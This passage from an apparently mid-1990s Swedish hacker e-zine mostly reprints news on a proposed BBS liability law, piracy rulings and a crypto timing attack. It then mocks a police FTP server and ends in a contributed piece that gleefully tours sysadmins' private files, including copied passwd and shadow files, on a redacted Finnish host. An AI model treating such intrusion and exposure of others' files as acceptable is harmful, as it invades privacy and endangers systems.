utredarna idag, var kritiken till stor del självförvållad. -Vi ville ha reaktioner så vi tog i ordentligt. Det var ett provskott! Leverans enligt order Men med fyra timmars bandad kritik i bagaget var det bara för utredarna att efter hearingen vända hem till lagskrivarverkstan med svansen mellan benen. Men ändå. Lydde inte utredarna bara order och effektuerade den beställning de fått? När Bildtregeringen tillsatte IT- utredningen sommaren 94 var det för att ta udden ur de kriminella anslagstavlorna. De som gjort sig bemärkta som forum för allehanda brottslig verksamhet; piratkopiering, främlings- fientlig propaganda, eller som informationskälla för narkotikatillverkning, virussspridning med mera. Att BBSer också kan vara kanaler för åsiktsutbyte omnämndes förvisso i utredningsdirektiven, men bara som en kollisionsrisk mellan datalagens personregister och censurförbudet i etablerade massmedier. Det var tydligt att regeringen främst var ute efter en snabbt hopkommen strafflag som kunde få slut på avarterna bland BBSerna. Ett synsätt den delar med många regeringar dessa dagar. Senast dokumenterat i en Europarådsrekommendation från september 95, där medlemsländerna uppmanas utfärda lagar som lägger ansvaret på systemoperatörerna. Och den svenske delegaten i arbetsgruppen bakom rekommendationen hette förstås: Per Furberg! BBS- kriminalitetens verkliga omfattning är det ingen som känner. Enligt RPS sysslar minst 1000 av de 4000-6000 BBSerna i landet regelmässigt med brott. Men är de verkligen så oåtkomliga med gällande lagar? Både ja och nej. En värmländsk BBS-ägare i Karlstad blev för en tid sedan bötfälld för att han tillåtit barnpornografiska bilder i sin databas. Han hade inte själv gjort något för att underlätta trafiken, men han kände till den. Domen överklagades men togs aldrig upp av hovrätten. Ett annat omdebatterat fall är helsingborgaren som åtalats för att ha upplåtit sin BBS för spridning av piratkopior. Målet avgörs i dagarna av Högsta Domstolen, men tills dess gäller den friande domen från hovrätten. Denna osäkerhet om lagstiftningens räckvidd är motivet till en särskild BBS-lag. I det preliminära förslaget passar utredarna också på att göra bland annat barnpornografi och rasistiska uttalanden åtalbara redan när de når fram till en BBS, vilket de inte är idag. Förslaget har blivit en blandning av den tryckfrihetsrättsliga modellen och vanlig strafflag. Enligt TF svarar en ansvarig utgivare ensam för brott som begås genom tryckt skrift. Enligt BBS-lagen ansvarar alla! Inte bara systemoperatören får ta smällen, utan även författare och andra bidragsgivare, för kränkande uttalanden, rasism, olagliga bilder och piratkopior. Fastän uppenbarligen inspirerad av ansvarssystemet i TF och Yttrandefrihetslagen (YGL) drämmer IT-utredningen till med dubbelt straffansvar. Ja, mångdubbelt om man betänker att i nät som Fidonet samma information studsar åtskilliga gånger mellan ett stort antal BBSer. Alternativ finns Även diskussionsgrupper (newsgroups), och chats på Internet träffas av bannbullan. Tusentals sådana möten mellanlandar dagligen på svenska universitets- och företagsdatorer. Blir BBS- förslaget lag kommer Sveriges systemoperatörer aldrig mer att våga gå och lägga sig om nätterna. De måste hela tiden kila upp och kolla hårddisken! I Australien har man skissat en modell med stegvis upptrappade sanktioner för dem som sprider sex och våld på nätet. Men tills vidare har man stannat för den lägsta ingreppsnivån, självsanering bland nätadministratörerna. Under tiden ska det faktiska behovet av en lagrevision kartläggas ordentligt. I USA laborerar domstolarna redan med utgivaransvar i vissa situationer. Databasägare som bara upplåter plats på skivminnen eller skickar materialet vidare obearbetat (distributors) slipper ansvar. De som försöker städa och hålla rent riskerar däremot att åka dit (publisher), vilket den välkända jätte-BBSen Prodigy fick erfara när den dömdes som ansvarig publisher för ärekränkande inlägg från en deltagare i den öppna, mycket populära, diskussionsgruppen Money Talks. Det senaste i USA är den nyligen antagna, Decency Act som är en del i den federala telelagen. Där bannlyses alla slags obsceniteter i ord och bild på nätet. Framförallt det som riktar sig mot ungdomar under 18 år. Databasägare som medvetet tillåter sådan trafik straffas med dryga böter eller upp till 2 års fängelse. De kan slippa ansvar om de på godtagbart sätt försökt hindra åtkomst för ungdomar. Ett alternativ som IT-utredningen fått att fundera över kommer från juristen vid Stockholms universitet Martin Brinnen. Han skriver en doktorsavhandling om telemedier och menar att utredningens förslag är onödigt detaljerat. Brinnen anser att man kan lägga ett generellt ansvar på alla tele-och nätoperatörer för det som går genom deras nät. Den som vill kan glida ur snaran genom att ha ett loggningssystem som avslöjar avsändarna. Enligt Brinnen skulle det räcka med ett litet ingrepp i telelagen, och man skulle slippa irriterande regler om censur, arkivering och tillsyn. Senast den 31 mars i år ska IT-utredningens slutförslag ligga hos regeringen. Från början gällde 1 november-95 som deadline, men efter debaclet vid hearingen begärde man extra tid. Utredningen har också ett uppdrag om elektroniska dokument så BBS-förslaget har legat i träda sedan augusti. -Men nu ska vi ta itu med den, säger Hans Jacobsson. Tänkte för smått Frågan är vilken roll kritiken får spela? -Jag vet inte. Men det är klart, när vi skissade vårt förslag hade jag en liten småskalig BBS i Nyköpingstrakten i tankarna. Nu har jag förstått att lagen drabbar många fler. -Som någon sa: rätt vad det är dimper det ned 40 Megabyte news från USA. -Arkivering i ett år under sådana omständigheter är att begära för mycket. Även annat måste nog omprövas menar Jacobsson. Sådant som möjligheterna att kontrollera innehållet och Datainspektionens roll. -Men den som vet vad han har i databasen bör kunna ta ett ansvar. BBS-lagen skulle ha trätt i kraft till sommaren om det ursprungliga schemat följts. Nu blir det tidigast till årskiftet. Nu står åtminstone tre olika kockar och rör i BBS-soppan. Förutom Jacobssons utredning, är det utredningen om Nya Medier och en nytillsatt Datalagsutredning. Men alla är i otakt och har inte kunnat prata ihop sig. Ett tänkbart scenario är att det kollektiva ansvar som IT- utredningen arbetar med kolliderar med ett enmansansvar av TFs modell, vilket utredningen om Nya medier kan tänkas föreslå. Och Datalagsutredningen kan snubbla på EUs persondatadirektiv vars normer för skydd av personuppgifter BBSer knappast lever upp till. Det kan bli en svår huvudvärk för regeringen. En ny lag får kanske snabbt bukt med problemen, men löper å andra sidan risk att behöva ändras radikalt redan efter något år. --------------------------------------------------------------------------- 6.6 Datateknik, 960215 Netscapes kryptering bruten på nytt-med gammal metod --------------------------------------------------------------------------- Dagens krypteringsalgoritmer är inte så säkra som experterna vill låta göra gällande. De kan inte knäckas med matematiska eller kryptotekniska tillvägagångssätt. Däremot kan de vara mycket sårbara mot okonventionella metoder. Paul Kocher, biologistuderande och inte alls någon säkerhetseller kryptoexpert, lyckades hitta en allvarlig svaghet i dagens krypteringssystem med öppna nycklar. Han visade att tiden det tar för att koda och avkoda meddelanden kan avslöja information om viktiga delar i krypteringsalgoritmerna. Många krypteringsprogram arbetar med öppna nycklar. Den öppna nyckeln är känd, medan varje användare har en egen privat. Nycklarna är vanligen mycket stora primtal. Vissa krypteringsprogram, som det i Netscape, använder den privata nyckeln som en exponent. Det höjer den privata nyckeln och ett annat primtal till potensen av den privata nyckeln, alltså nyckeln upphöjt till sig självt. Paul Kocher upptäckte att han fick ledtrådar till utformningen av den privata nyckeln efter hur lång tid meddelanden av olika längd tar att koda och avkoda. En miljard kombinationer kan vara omöjligt för en hacker att forcera, men om man genom Kochers teknik kan minska antalet möjliga fall till en miljon är krypteringen inte längre säker. Problemet med de olika beräkningstiderna har länge varit känt inom forskningen på kryptering, men kryptoexperter är matematiker och inga säkerhetsexperter, och kunskapen har inte trängt ut. --------------------------------------------------------------------------- 6.7 Datateknik, 960215 Storebror fumlar med lagböckerna --------------------------------------------------------------------------- En statlig utredning föreslår att den som driver en BBS måste vara minst 18 år och att han ska vara ansvarig för att basen inte innehåller något brottsligt. Han ska logga användarna så att de kan spåras av polisen och han ska spara allt som skickas in under ett år. Det är förstås ett orimligt förslag som, om det genomförs, raderar ut hela BBS-kulturen. Och därmed en hobby som sannolikt lockat många ungdomar att bli datatekniker. Här måste lagstiftarna hitta bättre lösningar. Christer Åkerman visar på sidorna 22-25 i detta nummer av Datateknik på de problem som uppsåtr om lagen antas. I USA har presidenten just skrivit på en ny telekommunikationslag. I lagen ingår en del som kallas Decency Act och som innebär att obsceniteter i ord och bild bannlyses på nätet. Framförallt vill man stoppa det som riktar sig till ungdomar under 18 år. Porr får endast spridas om man försäkrat sig om att mottagaren är vuxen och att denne verkligen vill se materialet. Förslaget har fått många WWW-publicister att protestera genom att lägga en sorgsvart bakgrund på sina sidor. Denna amerikanska strid står, förenklat, mellan en tryckfrihetsfundamentalistisk falang och den inflytelserika kristna högern. Mer om detta på våra nyhetssidor. Lägg så till dessa båda aktuella händelser debatten kring krypteringen. Åtskilliga av världens stater vill förhindra allt för kraftfull kryptering. Världens storebröder vill istället att vi ska använda kryptering med inbyggda lönndörrar för polisen. USA har förbjudit export av krypton med alltför långa nycklar. Vad vi ser är en match mellan tekniken (och individuella tekniker) och staterna. Det är svårt att tro att inte staterna till slut tar hem spelet. Men det är också svårt att se hur de ska lyckas med det när teknikerna tagit fram en så decentraliserade nätlösning som Internet. --------------------------------------------------------------------------- 6.8 TT, 960222 HD lät datakopierare behålla utrustning --------------------------------------------------------------------------- Högsta domstolen mildrade hovrättens dom och låter en 22-årig Stockholmare behålla merparten av sin datorutrustning. I hovrätten dömdes mannen för upphovsrättsintrång. Två datorer och sex hårddiskar ansågs vara förverkade. HD låter 22-åringen behålla allt utom en hårddisk som rätten anser innehålla upphovsrättsligt skyddat material som spritts via en elektronisk brevlåda, Bulletin Board System (BBS). 22- åringen har i sitt hem haft en databas med mycket stor kapacitet. I databasen har han haft minst 1 000 program som varit upphovsrättsligt skyddade. Under 1992 och 1993 gjorde mannen programmen tillgängliga för omkring 300 användare genom sin BBS. I databasen förekom också byten och kopieringar av olika program mellan användarna. I HD:s dom påpekar man att förverkande enligt upphovsrättslagen endast kan bli aktuell om man tror att material ska användas för brottslig verksamhet. HD anser att det bara är en av hårddiskarna som innehåller det upphovsrättsskyddade material som 22-åringen spritt i sin BBS. Därför får han nu tillbaka det andra materialet. --------------------------------------------------------------------------- 6.9 Computer Sweden, 960227 Lucka i lagen skyddar piratkopior --------------------------------------------------------------------------- Det är inte olagligt att ha en BBS där vem som helst kan hämta hem piratkopierade program. Högsta domstolen friade i torsdags en man som drev en sådan BBS, eftersom han inte själv aktivt medverkat till spridningen. Medverkandeansvaret togs aldrig upp när en man från Helsingborg stod åtalad i högsta domstolen för brott mot upphovsrättslagen. Mannen drev i början av 90-talet en BBS, en elektronisk anslagstavla, där piratkopierade program fanns tillgängliga för vem som helst att hämta. -Domen är bekymrande för mjukvaruindustrin. Som domen är formulerad säger den att man i princip aldrig kan utkräva ansvar av en systemoperatör, säger advokat Agne Lindberg som är juridiskt ombud för leverantörsorganisationen Business Software Alliance. -BSA kommer att verka för en lagförändring. Det borde gå att kräva ansvar av den som köper modem och lägger upp en databas. HD konstaterar i sin dom att det finns en påtaglig lucka i det upphovsrättsliga skyddet för program, men domstolen ansåg att man måste döma enligt lagens bokstav, och då ska mannen frias. -Hovrätten kunde inte bevisa att programmen faktiskt hade kopierats. Dessutom krävs bevis för att mannen var medveten om kopieringen. Därför kunde HD inte ta upp frågan, säger Nils Rekke, byråchef hos Riksåklagaren. Mannen fälldes i tingsrätten men friades i hovrätten. Nu har han alltså friats även av högsta domstolen. [ Se http://www.dsv.su.se/~jpalme/BBS-domen-HD-96-02-22.html för det fullständiga domslutet ] __ _ _ ___ ___ ___ ( _| U | ) = __________________________________________________________ 7.0 ___)___)_)_\_| av htXs Den hetaste URL:en just nu måste vara www.takedown.com, i alla fall om man får räkna imponansvärdet i "Kevin-on-Demand". Vi rekommenderar ett omedelbart besök. Om du inte skulle ha tillgång till en grafisk browser, gå rakt på höjdpunkten och telnet:a till kevin-on-demand.takedown.com på någon port mellan 4001 och 4028. Den vedertagna uppfattningen är nog att 4010 är absolut bäst. Du behöver inte göra något aktivt för att njuta av föreställningen, men du kan använda följande knappar för att styra hastigheten: 0-9 Move at a rate of 0-9. (0 is stopped.) > Move forward. If already moving forward, increase speed. < Move in reverse. If already in reverse, increase speed. } Single-step forward. { Single-step backward. + Increase speed by 0.5. - Decrease speed by 0.5. f,p Move forward. Reset speed to 1. F,P Move forward. Reset speed to 10. r Move in reverse. Reset speed to 1. R Move in reverse. Reset speed to 10. s Slow, then slower. / Skip. Pause. q Exit. __ __ __ ___ ___ ___ | V | ( _| __) _______________________________________________________ 8.0 |__v__|__|___)___) Rikspolisstyrelsen på Internet av Broken Pipe [NWS - Niggaz With Sniffers] Det verkar inte sämre än att snuten ämnar göra sin närvaro på Internet känd genom att fortsätta sitt arbete med att sprida harmoni, glädje och människo- kärlek även i digital form. domain: police.se org: Rikspolisstyrelsen admin-c: Patric Ostman address: Box 12256, S-102 26 Stockholm phone: +46 8-4019540 fax-no: +46 8-6507787 Domänen består av ett litet nät med ett par PCs och i alla fall en HP-box. Vad RPS internetssatsning kommer att innebära, och hur långt de kommit är svårt att säga. De har en www-sida som består av meddelandet "under uppbyggnad", och deras mail-server har följande att säga om livet: 220 mail.police.se ESMTP server (post.office v1.9.1 **** trial license expired ****) ready Dock verkar den fortfarande vara funktionsduligt. Vi får verkligen hoppas att inte RPS *olagligt* nyttjar en licens som gått ut! Det enda som man kan vara helt säker på är att den anonyma ftp-servern på ftp.police.se inte är subventionerad av ledningen inom Rikspolisstyrelsen. Eller är detta ett helt nytt grepp för att öka polisens populäritet? ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 13232 drwxr-xr-x 3 root root 3072 Jul 31 1995 . drwxrwxr-x 3 root wheel 1024 Jul 31 1995 .. -rw-r--r-- 1 root root 15395 Jul 31 1995 00INDEX -rw-r--r-- 1 root root 126176 Jul 31 1995 GiaGary.gif -rw-r--r-- 1 root root 56419 Jul 31 1995 LiLi.jpg -rw-r--r-- 1 root root 25857 Jul 31 1995 NEWinona17.jpg -rw-r--r-- 1 root root 1840 Jul 31 1995 README.uploads -rw-r--r-- 1 root root 37391 Jul 31 1995 W_Ryder.jpg -rw-r--r-- 1 root root 104200 Jul 31 1995 WinRyder08.jpg -rw-r--r-- 1 root root 120206 Jul 31 1995 WinRyder09.jpg -rw-r--r-- 1 root root 8846 Jul 31 1995 WinonaAgeInn1.jpg -rw-r--r-- 1 root root 13716 Jul 31 1995 WinonaAgeInn2.jpg -rw-r--r-- 1 root root 27053 Jul 31 1995 WinonaAgeInn3.jpg -rw-r--r-- 1 root root 36359 Jul 31 1995 WinonaAndJohnny.jpg -rw-r--r-- 1 root root 39715 Jul 31 1995 WinonaBeach.jpg -rw-r--r-- 1 root root 141603 Jul 31 1995 WinonaBed.jpg -rw-r--r-- 1 root root 11776 Jul 31 1995 WinonaBigHair.jpg -rw-r--r-- 1 root root 55552 Jul 31 1995 brooke.gif -rw-r--r-- 1 root root 34144 Jul 31 1995 chlock.gif -rw-r--r-- 1 root root 490090 Jul 31 1995 death_drop.gif -rw-r--r-- 1 root root 178693 Jul 31 1995 dick_button1.gif -rw-r--r-- 1 root root 492033 Jul 31 1995 doubleAxel2.gif -rw-r--r-- 1 root root 101999 Jul 31 1995 elaine_zayak1.gif -rw-r--r-- 1 root root 76037 Jul 31 1995 elana1.jpg -rw-r--r-- 1 root root 413766 Jul 31 1995 flip.gif -rw-r--r-- 1 root root 26064 Jul 31 1995 impressionist.gif -rw-r--r-- 1 root root 61489 Jul 31 1995 janet.jpg -rw-r--r-- 1 root root 245397 Jul 31 1995 karen_bryden.jpg -rw-r--r-- 1 root root 29130 Jul 31 1995 katerina_witt1.jpg -rw-r--r-- 1 root root 81503 Jul 31 1995 katerina_witt2.gif -rw-r--r-- 1 root root 129860 Jul 31 1995 katerina_witt3.jpg -rw-r--r-- 1 root root 184112 Jul 31 1995 katerina_witt4.gif -rw-r--r-- 1 root root 90131 Jul 31 1995 katerina_witt5.gif -rw-r--r-- 1 root root 74982 Jul 31 1995 katerina_witt6.gif -rw-r--r-- 1 root root 307617 Jul 31 1995 kerrig2a.gif -rw-r--r-- 1 root root 276742 Jul 31 1995 kerrig3a.gif -rw-r--r-- 1 root root 204805 Jul 31 1995 kerrig4a.gif -rw-r--r-- 1 root root 341938 Jul 31 1995 kerrig5a.gif -rw-r--r-- 1 root root 335129 Jul 31 1995 kerrig6a.gif -rw-r--r-- 1 root root 127534 Jul 31 1995 kimbass2.gif -rw-r--r-- 1 root root 43747 Jul 31 1995 kimbass5.jpg -rw-r--r-- 1 root root 45025 Jul 31 1995 kristi_yamaguchi1.gif -rw-r--r-- 1 root root 95620 Jul 31 1995 kristi_yamaguchi2.jpg -rw-r--r-- 1 root root 18101 Jul 31 1995 kristi_yamaguchi3.jpg -rw-r--r-- 1 root root 21514 Jul 31 1995 kristi_yamaguchi4.jpg -rw-r--r-- 1 root root 185324 Jul 31 1995 lisa_ervin1.gif -rw-r--r-- 1 root root 392736 Jul 31 1995 loop.gif -rw-r--r-- 1 root root 47811 Jul 31 1995 lu_chen1.jpg -rw-r--r-- 1 root root 385173 Jul 31 1995 lutz.gif -rw-r--r-- 1 root root 70669 Jul 31 1995 mariah1.jpg -rw-r--r-- 1 root root 185063 Jul 31 1995 michelle_kwan1.gif -rw-r--r-- 1 root root 181683 Jul 31 1995 michelle_kwan2.gif -rw-r--r-- 1 root root 56616 Jul 31 1995 midori_ito1.gif -rw-r--r-- 1 root root 36392 Jul 31 1995 midori_ito2.jpg -rw-r--r-- 1 root root 68899 Jul 31 1995 nancy_kerrigan1.gif -rw-r--r-- 1 root root 100710 Jul 31 1995 nancy_kerrigan2.gif -rw-r--r-- 1 root root 29968 Jul 31 1995 nancy_kerrigan3.jpg -rw-r--r-- 1 root root 30609 Jul 31 1995 nb_camp1.gif -rw-r--r-- 1 root root 164823 Jul 31 1995 nicole_bobek1.gif -rw-r--r-- 1 root root 39173 Jul 31 1995 nk_camp1.gif -rw-r--r-- 1 root root 69377 Jul 31 1995 ob_camp1.gif -rw-r--r-- 1 root root 48874 Jul 31 1995 ob_camp2.gif -rw-r--r-- 1 root root 62745 Jul 31 1995 ob_camp3.gif -rw-r--r-- 1 root root 64580 Jul 31 1995 ob_camp4.gif -rw-r--r-- 1 root root 50959 Jul 31 1995 ob_camp5.gif -rw-r--r-- 1 root root 59502 Jul 31 1995 ob_camp6.gif -rw-r--r-- 1 root root 39870 Jul 31 1995 ob_camp7.gif -rw-r--r-- 1 root root 38377 Jul 31 1995 ob_camp8.gif -rw-r--r-- 1 root root 228147 Jul 31 1995 oksana_bayul1.gif -rw-r--r-- 1 root root 169752 Jul 31 1995 oksana_bayul2.gif -rw-r--r-- 1 root root 123132 Jul 31 1995 oksna-17.jpg -rw-r--r-- 1 root root 112161 Jul 31 1995 oksna-au.gif -rw-r--r-- 1 root root 161280 Jul 31 1995 oksna-lm.jpg -rw-r--r-- 1 root root 76255 Jul 31 1995 oksna-oi.jpg -rw-r--r-- 1 root root 62121 Jul 31 1995 oksna-st.jpg -rw-r--r-- 1 root root 81408 Jul 31 1995 pa-hwf1.jpg -rw-r--r-- 1 root root 58387 Jul 31 1995 pa-mar92.jpg -rw-r--r-- 1 root root 64982 Jul 31 1995 pa-nov93.jpg -rw-r--r-- 1 root root 102037 Jul 31 1995 pa-pca1.jpg -rw-r--r-- 1 root root 84502 Jul 31 1995 pa-pca2.jpg -rw-r--r-- 1 root root 71168 Jul 31 1995 pa-port1.jpg -rw-r--r-- 1 root root 87936 Jul 31 1995 pa-soaks.jpg -rw-r--r-- 1 root root 68096 Jul 31 1995 pa-suita.jpg -rw-r--r-- 1 root root 677512 Jul 31 1995 pamelada.gif -rw-r--r-- 1 root root 18154 Jul 31 1995 pamiller.jpg -rw-r--r-- 1 root root 160431 Jul 31 1995 pfeifer1.jpg -rw-r--r-- 1 root root 54526 Jul 31 1995 pfeiffe3.jpg drwxr-xr-x 2 root root 1024 Jul 31 1995 playmate -rw-r--r-- 1 root root 248807 Jul 31 1995 poster.gif -rw-r--r-- 1 root root 128122 Jul 31 1995 pvkergn3.gif -rw-r--r-- 1 root root 88333 Jul 31 1995 pvkergn5.gif -rw-r--r-- 1 root root 252220 Jul 31 1995 pvoksna1.gif -rw-r--r-- 1 root root 299976 Jul 31 1995 pvsktmdl.gif -rw-r--r-- 1 root root 1840 Jul 31 1995 readme.upl -rw-r--r-- 1 root root 48329 Jul 31 1995 sandra.gif -rw-r--r-- 1 root root 98223 Jul 31 1995 sandra_b.jpg -rw-r--r-- 1 root root 533573 Jul 31 1995 sit.gif -rw-r--r-- 1 root root 771 Jul 31 1995 skate_cat.gif -rw-r--r-- 1 root root 9110 Jul 31 1995 spiral1.gif -rw-r--r-- 1 root root 94769 Jul 31 1995 surya_bonaly1.gif -rw-r--r-- 1 root root 26064 Jul 31 1995 surya_bonaly2.gif -rw-r--r-- 1 root root 258337 Jul 31 1995 tanja_szewczenko.gif -rw-r--r-- 1 root root 180200 Jul 31 1995 tanja_szewczenko2.gif -rw-r--r-- 1 root root 101327 Jul 31 1995 tanja_szewczenko3.gif -rw-r--r-- 1 root root 384265 Jul 31 1995 tloop.gif -rw-r--r-- 1 root root 146359 Jul 31 1995 tonya_harding1.gif -rw-r--r-- 1 root root 17428 Jul 31 1995 topthree.jpg -rw-r--r-- 1 root root 221906 Jul 31 1995 zam.jpg 226 Transfer complete. 7618 bytes received in 1.3 seconds (5.6 Kbytes/s) ftp> cd playmate 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 332 drwxr-xr-x 2 root root 1024 Jul 31 1995 . drwxr-xr-x 3 root root 3072 Jul 31 1995 .. -rw-r--r-- 1 root root 64712 Jul 31 1995 playmate-apr95.jpg -rw-r--r-- 1 root root 18204 Jul 31 1995 playmate-aug95-b.jpeg -rw-r--r-- 1 root root 27497 Jul 31 1995 playmate-dec94.jpg -rw-r--r-- 1 root root 48368 Jul 31 1995 playmate-feb95.jpg -rw-r--r-- 1 root root 26496 Jul 31 1995 playmate-jan95.jpg -rw-r--r-- 1 root root 63759 Jul 31 1995 playmate-jun95-b.jpg -rw-r--r-- 1 root root 23042 Jul 31 1995 playmate-mar95.jpg -rw-r--r-- 1 root root 51941 Jul 31 1995 playmate-may95.jpg 226 Transfer complete. 733 bytes received in 0.097 seconds (7.4 Kbytes/s) ftp> _______________________________________________________________________________ 8.2 En sysadmins samvete av CB [ Följande artikel fick vi via mail från ett konto som bergis inte tillhör avsändaren. Texten var signerad CB, så det är namnet som vi sätter ut som artikelförfattare. Tyvärr kände vi att det vore alltför grymt att hänga ut vissa personer som omnämndes, därför är delar av texten raderad, och vissa namn och adresser är borttagna. Vi har givetvis inte haft möjlighet att kontrollera någon av uppgifterna. ] Tur ar val att det finns sys admins. Hur skulle det annars se ut? Med en massa users som hackar, tradar w4r3z, och beter sig allmant illa at.. Tja, det kan vara ngt att tanka pa.. Men forst sa kan ni kolla pa hur olika sysadmin's bar sig at.. Hehe.. Till exempel pa -----.---.fi.. Kanske mera kant som ------- --------- -- ----------. Ett utdrag ur en ls -laR / .. total 312 drwxr-xr-x 20 root root 1024 Jan 10 11:37 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxr-xr-x 10 webadmin webadmin 1024 Jan 11 17:25 WWW drwxr-xr-x 2 root bin 2048 Jan 10 10:25 bin drwxr-xr-x 2 root root 1024 Aug 28 00:36 boot drwxr-xr-x 2 root root 4096 Jan 10 10:28 dev drwxr-xr-x 9 root root 3072 Jan 12 13:09 etc drwxrwxr-x 72 root root 2048 Jan 11 17:27 home drwxr-xr-x 3 root root 1024 Aug 17 00:09 lib drwxr-sr-x 6 list list 1024 Oct 26 23:19 list drwxr-xr-x 2 root root 12288 Jul 10 1995 lost+found drwxr-xr-x 2 root root 1024 Mar 16 1994 mnt drwxrwxr-x 4 root root 1024 Nov 26 20:27 private drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 private2 ^^^^^^^^ Hmm, bara att det finns en group som heter TheDudez tyder ju pa att sysadm verkar vara lite "oserios".. dr-xr-xr-x 7 root root 0 Jan 10 12:28 proc drwx------ 14 root root 2048 Jan 12 11:14 root drwxr-xr-x 2 root bin 2048 Aug 28 01:06 sbin drwxrwxrwt 5 root root 5120 Jan 12 19:00 tmp drwxr-xr-x 20 root root 1024 Aug 22 16:55 usr drwxr-xr-x 18 root root 1024 Jul 28 14:02 var -r-------- 1 root root 273412 Sep 14 10:46 vmlinuz Tja, ska vi borja med att kolla vad som finns i /private da.. /private: total 6 drwxr-xr-x 4 root root 1024 Nov 26 20:27 . drwxr-xr-x 20 root root 1024 Jan 10 11:37 .. drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 candyman drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 pone Tva stycken, enligt vad jag kan forsta sysadmins.. Eftersom de har egna group's och ligger i /private som ar agd av root.. For att inte namna att filer i deras hem-dir ar root-agda da.. Ska bli kul att se vad de har for roligt.. /private/candyman: total 711 drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 . drwxrwxr-x 4 root root 1024 Nov 26 20:27 .. -rw-r--r-- 1 candyman nighteam 0 Jul 11 1995 .addressbook -rw-r--r-- 1 candyman nighteam 1257 Jul 11 1995 .addressbook.lu -rw-r--r-- 1 candyman nighteam 451 Jan 12 13:19 .cshrc -rw-r--r-- 1 candyman nighteam 481 Jan 10 12:35 .cshrc~ -rw-r--r-- 1 candyman nighteam 122 Jan 10 12:41 .emacs -rw-r--r-- 1 candyman nighteam 24004 Aug 18 13:25 .fvwmrc -rw-r--r-- 1 candyman nighteam 24002 Aug 18 12:49 .fvwmrc~ -rw-r--r-- 1 candyman nighteam 164 Jul 10 1995 .kermrc -rw-r--r-- 1 candyman nighteam 34 Jun 6 1993 .less -rw-r--r-- 1 candyman nighteam 114 Nov 24 1993 .lessrc -rw-r--r-- 1 candyman nighteam 1 Dec 5 11:24 .login -rw-r--r-- 1 candyman nighteam 25 Dec 1 10:41 .login~ -rw-r--r-- 1 candyman nighteam 0 Nov 6 16:07 .mc.ini -rw-r--r-- 1 candyman nighteam 503 Nov 6 16:07 .mc.tree drwx------ 2 candyman nighteam 1024 Jan 12 12:51 .ncftp -rw------- 1 candyman nighteam 118 Dec 12 12:18 .ncrecent drwx------ 3 candyman nighteam 1024 Dec 20 15:44 .netscape -rw-r--r-- 1 candyman nighteam 2625 Jan 12 14:32 .netscape-bookmarks.html drwx------ 2 candyman nighteam 24576 Jan 12 18:47 .netscape-cache -rw------- 1 candyman nighteam 17401 Jul 25 13:18 .netscape-history -rw-r--r-- 1 candyman nighteam 148361 Jul 24 10:53 .netscape-newsgroups-news -rw-r--r-- 1 candyman nighteam 1686 Jan 12 14:30 .netscape-preferences -rw------- 1 candyman nighteam 0 Jan 10 12:33 .news_time -rw-r--r-- 1 candyman nighteam 13714 Jan 12 13:32 .newsrc -rw-r--r-- 1 candyman nighteam 258392 Nov 20 14:59 .newsrc.8728 drwx------ 2 candyman nighteam 1024 Sep 4 20:38 .nn -rw-r--r-- 1 candyman nighteam 13709 Jan 12 13:21 .oldnewsrc -rw------- 1 candyman nighteam 712 Jan 11 13:24 .pine-interrupted-mail -rw-r--r-- 1 candyman nighteam 5529 Jan 12 15:36 .pinerc -rw-r--r-- 1 candyman nighteam 480 Jan 10 11:48 .plan -rw-r--r-- 1 candyman nighteam 454 Dec 22 09:24 .plan~ -rw-r--r-- 1 candyman nighteam 58 Nov 15 14:55 .project -rw-r--r-- 1 candyman nighteam 58 Nov 8 17:10 .project~ -rw-r--r-- 1 candyman nighteam 17 Sep 4 21:32 .signature -rw-r--r-- 1 candyman nighteam 15 Oct 20 20:05 .slirprc -rw-r--r-- 1 candyman nighteam 23 Oct 20 19:52 .slirprc~ -rw-r--r-- 1 candyman nighteam 63 Jan 12 13:19 .tcshrc -rw-r--r-- 1 candyman nighteam 33 Jan 10 12:43 .tcshrc~ drwxr-xr-x 2 candyman nighteam 1024 Aug 25 13:49 .term drwxr-xr-x 4 candyman nighteam 1024 Jan 12 13:32 .tin -rw-r--r-- 1 candyman nighteam 94 Aug 18 12:35 .xinitrc -rw-r--r-- 1 candyman nighteam 66 Aug 18 12:19 .xinitrc~ -rw-r--r-- 1 candyman nighteam 118372 Dec 19 16:33 Configure.help-1.3 drwxr-xr-x 9 candyman access 1024 Dec 14 14:29 Linux drwx------ 2 candyman nighteam 1024 Nov 24 10:21 Mail drwx------ 2 candyman nighteam 1024 Nov 24 10:21 News drwx------ 3 candyman nighteam 1024 Oct 26 23:05 build drwx------ 22 candyman nighteam 1024 Dec 14 15:44 download drwx------ 5 candyman nighteam 1024 Dec 13 11:26 graphics drwxr-xr-x 2 candyman nighteam 1024 Oct 12 12:33 html -rwxr-xr-x 1 root root 8752 Jan 10 12:14 linuxfin.txt drwx------ 2 candyman nighteam 1024 Jan 12 10:50 mail -rw------- 1 candyman nighteam 1971 Jan 10 16:28 mbox drwx------ 3 candyman nighteam 1024 Dec 13 12:39 netscape drwx------ 2 candyman nighteam 2048 Oct 12 11:23 news drwx------ 2 candyman nighteam 1024 Oct 10 13:10 para-proc drwx------ 2 candyman nighteam 1024 Dec 7 14:54 prosa drwx------ 2 candyman nighteam 1024 Jan 10 11:54 shadow drwx------ 4 candyman nighteam 1024 Oct 12 11:29 source drwxrwx--- 5 candyman access 1024 Jan 12 18:50 teddy drwx------ 2 candyman nighteam 1024 Jan 10 10:47 tmp Well, han hade en hel del skit.. Men i tmp kanske det finns ngt roligt.. Lat oss checka.. /private/candyman/tmp: total 20 drwx------ 2 candyman nighteam 1024 Jan 10 10:47 . drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 .. -rw-r--r-- 1 root root 1470 Dec 15 00:25 aliases -rwx------ 1 candyman nighteam 3617 Aug 8 17:52 evitech.fi -rwx------ 1 candyman nighteam 250 Aug 11 11:44 guessed -rwx------ 1 candyman nighteam 9 Aug 8 17:49 katjahmr -rw-r--r-- 1 root root 5091 Jan 9 14:20 passwd -r-------- 1 root root 3504 Jan 9 14:27 shadow Hehe, joda.. Det skulle jag nog vilja saga.. Tre av filerna har han tydligen satt upp nar han kort med root oxa.. Well, kanske ska beratta vad 